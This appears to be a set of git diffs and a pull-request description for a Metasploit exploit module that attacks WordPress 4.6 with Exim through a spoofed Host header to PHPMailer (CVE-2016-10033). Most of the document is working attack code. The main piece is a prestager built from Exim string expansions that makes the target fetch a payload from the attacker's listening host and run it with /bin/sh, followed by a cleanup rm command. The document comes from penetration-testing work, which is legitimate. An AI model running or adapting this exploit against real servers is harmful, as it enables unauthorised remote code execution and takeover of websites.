@@ -77,14 +77,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Generating #{cmdstager_flavor} command stager")
     @cmdstager = generate_cmdstager(
-      'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}",
-      :ssl   => datastore['SSL'],
-      :temp  => datastore['WritableDir'],
-      :file  => File.basename(cmdstager_path)
+      'Path'   => "/#{Rex::Text.rand_text_alpha_lower(8)}",
+      :temp    => datastore['WritableDir'],
+      :file    => File.basename(cmdstager_path),
+      :nospace => true
     ).join(';')
 
-    print_status("Generating and sending #{cmdstager_flavor} prestager")
-    generate_prestager(prestager_path).each do |command|
+    print_status("Generating and sending Exim prestager")
+    generate_prestager.each do |command|
       vprint_status("Sending #{command}")
       send_request_payload(command)
     end
@@ -95,21 +95,14 @@ class MetasploitModule < Msf::Exploit::Remote
   #
 
   # Absolute paths are required for prestager commands due to execve(2)
-  def generate_prestager(file)
-    prestager = []
-
-    case cmdstager_flavor
-    when 'wget'
-      options = "-q --no-check-certificate --output-document #{file}"
-    when 'curl'
-      options = "-kso #{file}"
-    end
-
-    prestager << "/usr/bin/#{cmdstager_flavor} #{options} #{get_uri}"
-    prestager << "/bin/sh #{prestager_path}"
-    prestager << "/bin/rm -f #{prestager_path} #{cmdstager_path}"
-
-    prestager
+  def generate_prestager
+    prestager  = []
+    # This is basically sh -c `wget` implemented using Exim string expansions
+    prestager << '/bin/sh -c ${extract{-1}{${run{/bin/echo}}}{${readsocket{' \
+                 "inet:#{srvhost_addr}:#{srvport}}{get #{get_resource} "\
+                 'http/1.0${run{/bin/echo}}${run{/bin/echo}}}}}}'
+    # CmdStager should rm the file, but it blocks on the payload, so we do it
+    prestager << "/bin/rm -f #{cmdstager_path}"
   end
 
   def send_request_payload(command)
@@ -155,11 +148,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cmdstager_path
     @cmdstager_path ||=
-      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
-  end
-
-  def prestager_path
-    @prestager_path ||=
       "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
   end
 

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -96,11 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Absolute paths are required for prestager commands due to execve(2)
   def generate_prestager
-    prestager  = []
+    prestager = []
+
     # This is basically sh -c `wget` implemented using Exim string expansions
-    prestager << '/bin/sh -c ${extract{-1}{${run{/bin/echo}}}{${readsocket{' \
-                 "inet:#{srvhost_addr}:#{srvport}}{get #{get_resource} "\
-                 'http/1.0${extract{0}{${run{/bin/echo}}}{$value$value}}}}}}'
+    prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
+      '{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
+      "{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
+
     # CmdStager should rm the file, but it blocks on the payload, so we do it
     prestager << "/bin/rm -f #{cmdstager_path}"
   end

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -15,7 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'                => 'WordPress PHPMailer Host Header Command Injection',
       'Description'         => %q{
         This module exploits a command injection vulnerability in WordPress
-        version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer.
+        version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,
+        a mail-sending library that is bundled with WordPress.
 
         A valid WordPress username is required to exploit the vulnerability.
         Additionally, due to the altered Host header, exploitation is limited to

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
     ])
 
-    deregister_options('VHOST')
+    deregister_options('VHOST', 'URIPATH')
   end
 
   def check

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -5,7 +5,6 @@
 
 class MetasploitModule < Msf::Exploit::Remote
 
-  # XXX: Various Apache versions are returning 400 for a Host header with parens
   Rank = AverageRanking
 
   include Msf::Exploit::Remote::HTTP::Wordpress
@@ -22,6 +21,10 @@ class MetasploitModule < Msf::Exploit::Remote
         A valid WordPress username is required to exploit the vulnerability.
         Additionally, due to the altered Host header, exploitation is limited to
         the default virtual host, assuming the header isn't mangled in transit.
+
+        If the target is running Apache 2.2.32 or 2.4.24 and later, the server
+        may have HttpProtocolOptions set to Strict, preventing a Host header
+        containing parens from passing through, making exploitation unlikely.
       },
       'Author'              => [
         'Dawid Golunski', # Vulnerability discovery
@@ -30,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'          => [
         ['CVE', '2016-10033'],
         ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html'],
-        ['URL', 'http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html']
+        ['URL', 'http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html'],
+        ['URL', 'https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions']
       ],
       'DisclosureDate'      => 'May 3 2017',
       'License'             => MSF_LICENSE,
@@ -116,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_request_payload(command)
-    send_request_cgi(
+    res = send_request_cgi(
       'method'        => 'POST',
       'uri'           => wordpress_url_login,
       'headers'       => {
@@ -131,6 +135,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'wp-submit'   => 'Get New Password'
       }
     )
+
+    if res.nil?
+      fail_with(Failure::UnexpectedReply, 'Server returned nil response')
+    elsif res && !res.redirect?
+      fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")
+    end
+
+    res
   end
 
   def generate_exim_payload(command)

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # This is basically sh -c `wget` implemented using Exim string expansions
     prestager << '/bin/sh -c ${extract{-1}{${run{/bin/echo}}}{${readsocket{' \
                  "inet:#{srvhost_addr}:#{srvport}}{get #{get_resource} "\
-                 'http/1.0${run{/bin/echo}}${run{/bin/echo}}}}}}'
+                 'http/1.0${extract{0}{${run{/bin/echo}}}{$value$value}}}}}}'
     # CmdStager should rm the file, but it blocks on the payload, so we do it
     prestager << "/bin/rm -f #{cmdstager_path}"
   end

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && !res.redirect?
-      if res.code == 400 && res.headers['Server'].start_with?('Apache')
+      if res.code == 400 && res.headers['Server'] =~ /^Apache/
         fail_with(Failure::NotVulnerable, 'HttpProtocolOptions may be Strict')
       else
         fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")


### PR DESCRIPTION
**Note: this is a WordPress core vulnerability, since PHPMailer is bundled software. The only thing you probably need to install is Exim.**

```
msf exploit(wp_phpmailer_host_header) > info

       Name: WordPress PHPMailer Host Header Command Injection
     Module: exploit/unix/webapp/wp_phpmailer_host_header
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-05-03

Provided by:
  Dawid Golunski
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   WordPress 4.6 / Exim

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The base path to the wordpress application
  USERNAME   admin            yes       WordPress username

Payload information:

Description:
  This module exploits a command injection vulnerability in WordPress 
  version 4.6 with Exim as an MTA via a spoofed Host header to 
  PHPMailer, a mail-sending library that is bundled with WordPress. A 
  valid WordPress username is required to exploit the vulnerability. 
  Additionally, due to the altered Host header, exploitation is 
  limited to the default virtual host, assuming the header isn't 
  mangled in transit. If the target is running Apache 2.2.32 or 2.4.24 
  and later, the server may have HttpProtocolOptions set to Strict, 
  preventing a Host header containing parens from passing through, 
  making exploitation unlikely.

References:
  https://cvedetails.com/cve/CVE-2016-10033/
  https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
  http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html
  https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions

msf exploit(wp_phpmailer_host_header) > 
```